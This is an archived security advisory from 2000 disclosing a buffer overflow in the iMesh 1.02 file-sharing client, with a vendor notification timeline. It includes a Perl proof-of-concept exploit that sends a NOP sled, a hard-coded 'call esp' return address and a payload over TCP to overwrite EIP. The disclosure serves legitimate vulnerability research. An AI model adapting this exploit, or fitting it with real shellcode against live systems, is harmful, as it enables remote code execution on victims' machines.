exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

imbof102.txt

imbof102.txt
Posted Jun 29, 2000
Authored by Blue Panda | Site bluepanda.box.sk

iMesh 1.02 builds 116 and 177 for Windows are vulnerable to a buffer overflow that can be exploited to execute arbitrary code. Once iMesh connects to a server, it begins listening on a TCP port (varies). An attacker can connect to this port and cause an overflow which will overwrite EIP, effectively redirecting the flow of execution.

tags | exploit, overflow, arbitrary, tcp
systems | windows
SHA-256 | 7e6502a1050bf172ba5bec4d156f3a8bc7a2d4a1cece70a84fffcb07c167cf9c

imbof102.txt

Change Mirror Download
================================================================
BluePanda Vulnerability Announcement: iMesh 1.02 Build 116/117
29/06/2000 (dd/mm/yyyy)

bluepanda@dwarf.box.sk
http://bluepanda.box.sk/
================================================================

====================
Brief description:
====================

iMesh 1.02 builds 116 and 177 are vulnerable to a buffer overflow that can be
exploited to execute arbitrary code. Once iMesh connects to a server, it
begins listening on a TCP port (varies). An attacker can connect to this port
and cause an overflow which will overwrite EIP, effectively redirecting the
flow of execution.

================
Vendor status:
================

iMesh were notified of this vulnerability on Sunday the 18th of June. Proof
of concept was provided, and I did not receive a response from them until
that Thursday. I replied that night, and did not receive a reply until the
following Tuesday (the 27th of June). I was informed that the problem had
been fixed, but a patch would not be made available to the public, and the
changes would be incorporated into the next version of iMesh - the release
date of which I was not given.

=====================
Affected versions:
=====================

Vulnerable: iMesh 1.02 Build 116/117, possibly prior versions (untested).
Immune: No publicly released version of iMesh as of 29/06/2000 (dd/mm/yyyy).

===================
Proof of concept:
===================

#!/usr/bin/perl
#
# iMesh 1.02 Build 116/117 client buffer overflow
# Blue Panda - bluepanda@dwarf.box.sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Note: The payload executed by this script just calls ExitProcess (causing
# iMesh to exit silently).
#

use IO::Socket;

$host = "localhost";
$port = "4011"; # This may require adjustment.

# Call ExitProcess.
$payload = "\xff\x25\x18\xb2\x4c\x00";

$count = 0;
$es = "";
while($count < 0x272d) {
$es .= "\x90";
$count += 1;
}
$es .= "\x43\x04\x43\x00"; # IMESHCLIENT.EXE, call esp
$count = 0;
while($count < 2048) {
$es .= "\x90";
$count += 1;
}
$es .= $payload; # Tack the payload onto the end.

print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "unable to connect.\n";
print "done.\n";
print $socket "$es";

print "Waiting 5 seconds...\n";
sleep(5);

# Done.
close($socket);
print "Finished.\n";

Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close